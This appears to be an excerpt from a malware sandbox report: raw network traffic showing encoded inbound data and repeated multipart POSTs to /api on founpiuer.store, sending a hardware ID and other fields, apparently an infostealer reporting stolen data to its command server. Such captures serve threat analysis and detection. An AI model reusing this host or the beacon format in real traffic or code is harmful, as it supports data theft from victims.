mWEXQsWpulAQrL5vkOsSZ1Um5GMP8Bo6AzeU2loElt2NNTJnlJiLTRCc937x95pvATZUW1f9IlsrYrDycwXrzYVpBm+8iYo8BLi6e7jvIkdpIuhTE8ASJg8b+KZWHMLkmEQmX8Wo63TIwMo7yf/yf2EC9A4TpRpDExuB7yMEps2pYQZbtIm2SDTIkk+ovzpzfQLUZzfsPhI/L4T+XgGL9JlhR0LFqVI0JLAuU6DSJg5hX+hLItlDJgM3kMZ+IKL
2024-11-05 09:13:00 UTC	183	IN	Data Raw: 6c 75 5a 71 4c 4e 30 44 4f 47 58 48 70 42 4c 75 71 5a 52 76 67 46 58 62 75 42 48 4a 67 38 32 73 59 39 43 4e 49 62 39 75 55 45 2b 5a 35 53 42 72 6c 67 67 72 49 5a 50 74 4f 4d 2b 64 30 30 75 37 45 63 6a 38 44 6f 71 48 7a 75 4d 30 6d 4d 46 73 38 32 46 48 43 63 69 70 44 33 57 57 43 69 5a 6c 67 4b 6f 6b 69 5a 76 61 44 75 4a 56 79 50 38 4f 6a 34 48 4e 37 54 32 59 68 43 71 33 5a 31 6c 50 6b 2b 59 75 5a 35 77 4c 4a 43 6d 52 37 6a 7a 49 6b 4e 31 42 73 52 43 45 75 45 69 4f 6e 49 47 30 65 36 47 43 4e 4b 52 32 55 77 6d 50 70 7a 4d 69 6d 67 68 67 66 0d 0a Data Ascii: luZqLN0DOGXHpBLuqZRvgFXbuBHJg82sY9CNIb9uUE+Z5SBrlggrIZPtOM+d00u7Ecj8DoqHzuM0mMFs82FHCcipD3WWCiZlgKokiZvaDuJVyP8Oj4HN7T2YhCq3Z1lPk+YuZ5wLJCmR7jzIkN1BsRCEuEiOnIG0e6GCNKR2UwmPpzMimghgf
2024-11-05 09:13:00 UTC	1369	IN	Data Raw: 33 37 61 33 0d 0a 64 2f 6c 4c 38 4f 57 32 45 75 31 45 4d 66 35 44 34 53 43 7a 65 59 79 6d 49 63 74 75 6e 52 63 52 5a 37 75 4a 47 36 54 43 53 6f 6d 6b 71 52 7a 69 5a 76 4f 44 75 4a 56 36 50 45 46 70 34 2f 4e 36 33 75 50 7a 7a 76 7a 59 56 4d 4a 79 4b 6b 6d 61 4a 45 4e 49 43 79 61 37 44 62 41 6d 64 64 46 76 78 62 43 2b 77 65 41 6c 73 76 76 4e 5a 4f 4e 4c 72 56 6e 58 46 75 59 34 47 6f 73 33 51 4d 34 5a 63 65 6b 48 4d 65 52 77 6b 6d 71 56 64 75 34 45 63 6d 44 7a 61 78 6a 30 49 49 6a 76 47 56 65 52 4a 62 67 49 6d 4b 62 41 53 38 6f 6b 65 4d 36 79 5a 48 59 51 62 77 64 79 66 6f 44 68 34 33 48 37 44 71 61 77 57 7a 7a 59 55 63 4a 79 4b 6b 61 59 5a 30 45 4f 32 57 41 71 69 53 4a 6d 39 6f 4f 34 6c 58 57 2f 41 47 4a 68 38 37 72 50 35 75 4e 4a 37 5a 70 58 45 43 56 34 43 Data Ascii: 37a3d/lL8OW2Eu1EMf5D4SCzeYymIctunRcRZ7uJG6TCSomkqRziZvODuJV6PEFp4/N63uPzzvzYVMJyKkmaJENICya7DbAmddFvxbC+weAlsvvNZONLrVnXFuY4Gos3QM4ZcekHMeRwkmqVdu4EcmDzaxj0IIjvGVeRJbgImKbAS8okeM6yZHYQbwdyfoDh43H7DqawWzzYUcJyKkaYZ0EO2WAqiSJm9oO4lXW/AGJh87rP5uNJ7ZpXECV4C
2024-11-05 09:13:00 UTC	1369	IN	Data Raw: 4c 47 58 48 70 44 7a 46 6b 39 56 42 75 52 62 46 2f 42 71 62 69 4d 6a 6b 50 70 79 4b 4c 4c 56 30 57 55 61 5a 36 69 6c 72 6d 67 77 73 4c 35 7a 6a 66 59 66 63 30 56 62 36 54 59 54 56 48 35 6d 4a 67 66 4e 31 69 63 45 6c 76 79 59 48 43 5a 6a 6b 49 6d 69 5a 41 79 30 69 6d 65 30 76 77 4a 6e 59 54 72 34 65 79 2f 41 4d 69 6f 54 54 36 6a 2b 59 67 69 2b 2b 61 46 78 4e 30 4b 64 71 5a 59 56 45 65 47 57 74 36 54 50 53 6b 39 46 66 73 46 58 62 75 42 48 4a 67 38 32 73 59 39 43 46 4c 4b 46 74 58 6b 4b 62 35 79 31 74 6d 41 34 67 4b 70 76 6e 4d 38 4b 64 31 55 61 33 47 4d 72 38 41 59 43 44 7a 65 67 38 30 4d 39 69 74 48 34 66 45 64 44 43 43 30 2b 78 41 7a 70 6c 67 4b 6f 6b 69 5a 76 61 44 75 4a 56 79 50 38 45 67 34 2f 47 35 6a 57 5a 6a 79 6d 68 64 46 78 4e 6b 2b 41 70 5a 5a 51 Data Ascii: LGXHpDzFk9VBuRbF/BqbiMjkPpyKLLV0WUaZ6ilrmgwsL5zjfYfc0Vb6TYTVH5mJgfN1icElvyYHCZjkImiZAy0ime0vwJnYTr4ey/AMioTT6j+Ygi++aFxN0KdqZYVEeGWt6TPSk9FfsFXbuBHJg82sY9CFLKFtXkKb5y1tmA4gKpvnM8Kd1Ua3GMr8AYCDzeg80M9itH4fEdDCC0+xAzplgKokiZvaDuJVyP8Eg4/G5jWZjymhdFxNk+ApZZQ
2024-11-05 09:13:00 UTC	1369	IN	Data Raw: 36 52 7a 69 5a 76 4f 44 75 4a 56 36 66 6f 50 6f 49 50 61 72 43 54 65 6d 47 4b 30 61 68 38 52 30 4f 67 68 61 4a 49 4a 49 79 4f 63 37 7a 6a 44 6e 64 46 47 74 77 66 48 2b 51 65 4e 68 4d 37 71 50 5a 47 4f 4a 4c 52 76 58 6b 47 58 71 57 51 69 6d 68 78 67 66 64 2f 4b 4f 73 71 59 6c 6c 48 30 44 49 54 78 42 4d 6e 63 67 65 77 78 6d 6f 73 73 73 32 46 4e 54 35 6e 70 4b 58 43 65 41 69 67 6a 6b 2b 67 77 77 5a 58 57 53 37 45 59 7a 2f 73 4f 69 59 2f 41 72 48 58 51 68 6a 72 7a 50 68 39 34 6e 65 63 75 62 4a 34 55 4a 32 57 41 71 69 53 4a 6d 39 6f 4f 34 6c 58 4c 2f 78 71 4f 67 63 6e 6c 4f 35 36 49 4b 37 52 69 58 45 69 55 35 53 56 72 6e 67 77 68 4c 5a 44 6e 50 63 4b 55 33 45 2b 30 45 49 53 34 53 49 36 63 67 62 52 37 76 34 49 6e 75 47 63 64 62 70 62 75 4a 69 4b 43 53 6a 6c 6c Data Ascii: 6RziZvODuJV6foPoIParCTemGK0ah8R0OghaJIJIyOc7zjDndFGtwfH+QeNhM7qPZGOJLRvXkGXqWQimhxgfd/KOsqYllH0DITxBMncgewxmosss2FNT5npKXCeAigjk+gwwZXWS7EYz/sOiY/ArHXQhjrzPh94necubJ4UJ2WAqiSJm9oO4lXL/xqOgcnlO56IK7RiXEiU5SVrngwhLZDnPcKU3E+0EIS4SI6cgbR7v4InuGcdbpbuJiKCSjll
2024-11-05 09:13:00 UTC	1369	IN	Data Raw: 65 53 30 56 69 72 57 4f 50 73 42 59 2b 54 30 4b 78 31 30 49 64 69 36 7a 59 52 43 5a 54 34 61 6a 72 4e 56 6e 74 77 7a 4c 4e 74 6d 34 4f 59 56 2f 6f 44 68 4b 35 61 78 38 54 54 72 47 50 51 78 69 47 68 64 46 6c 4b 68 75 70 74 58 4b 4d 71 4a 79 4f 61 34 79 32 4c 73 74 31 61 76 56 57 4b 74 67 66 4a 33 50 69 73 63 39 43 2b 62 50 4e 2b 48 78 48 51 33 43 6c 73 6b 77 4d 32 4e 4e 4c 4b 4f 73 2b 5a 30 56 37 34 4f 38 2f 69 44 38 6e 4b 67 65 70 37 79 4e 46 73 38 32 4a 4f 43 63 69 35 65 44 6e 49 56 33 64 31 7a 66 74 7a 30 4e 7a 41 44 75 4a 48 69 72 59 61 79 64 79 42 71 7a 69 43 6b 79 53 77 63 46 77 4f 72 74 63 70 64 4a 41 4c 4b 79 53 68 32 68 50 45 6e 64 56 41 2b 43 54 53 2b 78 69 4b 67 63 62 53 42 5a 36 47 4e 72 52 6f 57 55 6e 51 70 32 70 74 33 56 77 5a 5a 64 65 6b 41 Data Ascii: eS0VirWOPsBY+T0Kx10Idi6zYRCZT4ajrNVntwzLNtm4OYV/oDhK5ax8TTrGPQxiGhdFlKhuptXKMqJyOa4y2Lst1avVWKtgfJ3Pisc9C+bPN+HxHQ3ClskwM2NNLKOs+Z0V74O8/iD8nKgep7yNFs82JOCci5eDnIV3d1zftz0NzADuJHirYaydyBqziCkySwcFwOrtcpdJALKySh2hPEndVA+CTS+xiKgcbSBZ6GNrRoWUnQp2pt3VwZZdekA
2024-11-05 09:13:00 UTC	1369	IN	Data Raw: 63 34 55 43 58 6f 56 6a 62 6d 34 2f 31 65 34 62 42 65 75 45 6f 48 31 76 51 73 57 6f 6c 6e 68 59 79 49 35 7a 79 50 6f 36 69 36 47 6d 30 45 73 58 67 47 49 53 49 34 4f 38 71 6d 72 38 63 70 6d 56 52 52 35 66 2f 4f 79 4c 54 52 43 39 6c 78 39 31 39 67 64 7a 70 41 50 6f 4e 68 4b 35 49 76 49 66 50 34 6a 79 47 6b 47 2b 55 61 46 68 49 68 76 6b 6e 62 72 77 48 4d 53 2f 66 71 6e 33 50 33 49 34 63 39 46 58 41 35 30 6a 52 31 4a 4f 33 62 73 50 57 63 75 46 35 45 56 44 51 2f 32 6f 36 7a 30 70 67 4e 39 2b 38 66 59 36 66 78 46 79 38 46 74 4c 31 54 37 65 36 35 50 73 34 67 49 63 68 6a 56 68 30 52 5a 62 75 4d 47 57 62 49 67 42 6c 30 61 51 79 69 63 54 76 44 76 4a 56 2b 37 68 49 6b 63 53 5a 72 41 36 54 6a 79 79 30 63 45 34 45 74 66 34 70 63 70 73 48 59 47 76 66 34 6e 32 52 7a 4a Data Ascii: c4UCXoVjbm4/1e4bBeuEoH1vQsWolnhYyI5zyPo6i6Gm0EsXgGISI4O8qmr8cpmVRR5f/OyLTRC9lx919gdzpAPoNhK5IvIfP4jyGkG+UaFhIhvknbrwHMS/fqn3P3I4c9FXA50jR1JO3bsPWcuF5EVDQ/2o6z0pgN9+8fY6fxFy8FtL1T7e65Ps4gIchjVh0RZbuMGWbIgBl0aQyicTvDvJV+7hIkcSZrA6Tjyy0cE4Etf4pcpsHYGvf4n2RzJ

Timestamp	Bytes transferred	Direction	Data
2024-11-05 09:13:02 UTC	370	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Ad1twZF74K.8uci5JLNCs3ar1E4QIMh2qJpcEcd8nfE-1730797979-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12840 Host: founpiuer.store
2024-11-05 09:13:02 UTC	12840	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 30 38 38 46 36 43 37 39 39 36 34 37 35 31 37 42 30 38 38 30 31 34 36 36 32 31 32 46 31 46 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"D088F6C799647517B08801466212F1F1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-11-05 09:13:02 UTC	1009	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 09:13:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ird24nkkvk7ibbbmf80n8bo2p7; expires=Sat, 01-Mar-2025 02:59:41 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JRZ2nazxAa1yB5H7VhPSvx9fYa0HFvNfqHBJbMkmWswpJTLoDdQaymPiufS9QaICTuyRKly21DnfvQRGOBiqHUYw3HM%2BY8%2BxgQMg2LrlwGF0418JfwuKkmGWO6BX5cZNeAI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ddbb9bc1dbd475a-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=928&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2838&recv_bytes=13868&delivery_rate=3019812&cwnd=251&unsent_bytes=0&cid=f8d78497ee46b8ba&ts=550&x=0"
2024-11-05 09:13:02 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 0d 0a Data Ascii: 11ok 173.254.250.76
2024-11-05 09:13:02 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-11-05 09:13:03 UTC	370	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Ad1twZF74K.8uci5JLNCs3ar1E4QIMh2qJpcEcd8nfE-1730797979-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15082 Host: founpiuer.store
2024-11-05 09:13:03 UTC	15082	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 30 38 38 46 36 43 37 39 39 36 34 37 35 31 37 42 30 38 38 30 31 34 36 36 32 31 32 46 31 46 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"D088F6C799647517B08801466212F1F1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"2--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-11-05 09:13:04 UTC	1021	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 09:13:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=jr1eppkhbedeoljtndtm3sbida; expires=Sat, 01-Mar-2025 02:59:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=exC4JbuUIREIyq%2BQcgulNZMIjdhj0AT%2B%2BHDTYtQNeMpX0QB38E5bVH5GwPwPH31u8SWe4XWGgY5LeFHKWuTwOHJzw2nnhT3%2F0%2F5H7SSBDFP4jcmgoV%2Fp9X%2B04nGOgAVduvw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ddbb9c3df55486f-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1186&sent=11&recv=22&lost=0&retrans=0&sent_bytes=2839&recv_bytes=16110&delivery_rate=2701492&cwnd=241&unsent_bytes=0&cid=3500729d0f85fa16&ts=784&x=0"
2024-11-05 09:13:04 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 0d 0a Data Ascii: 11ok 173.254.250.76
2024-11-05 09:13:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-11-05 09:13:05 UTC	370	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 Cookie: __cf_mw_byp=Ad1twZF74K.8uci5JLNCs3ar1E4QIMh2qJpcEcd8nfE-1730797979-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20572 Host: founpiuer.store
2024-11-05 09:13:05 UTC	15331	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 30 38 38 46 36 43 37 39 39 36 34 37 35 31 37 42 30 38 38 30 31 34 36 36 32 31 32 46 31 46 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"D088F6C799647517B08801466212F1F1--be85de5ipdocierre1Content-Disposition: form-data; name="pid"3--be85de5ipdocierre1Content-Disposition: form-data; name="lid"4SD0y4--legen
2024-11-05 09:13:05 UTC	5241	OUT	Data Raw: 5a 3e 93 af 35 13 92 cd 36 8a 95 d9 76 89 c4 4d c9 4d d9 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: Z>56vMMZh'F3Wun 4F([:7s~X`nO
2024-11-05 09:13:05 UTC	1009	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 09:13:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=si45pb1ghccnjj2c52nfa6k62m; expires=Sat, 01-Mar-2025 02:59:44 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wOBfw7YRqXBuyLnr0IAEv1mEYp9rpsNFWqCm3jBXuxp9ZY8qg6giYOZXXwawaUceEWHwvEQufo53cmCYItxdCxah4tKxn0WdR06ctPJ7rYoKAwufEJeYS%2FpAFUy5nByec0g%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ddbb9cecfefe766-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1706&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2838&recv_bytes=21622&delivery_rate=1643586&cwnd=239&unsent_bytes=0&cid=f79c03f0c8fa468e&ts=670&x=0"
2024-11-05 09:13:05 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 0d 0a Data Ascii: 11ok 173.254.250.76
2024-11-05 09:13:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0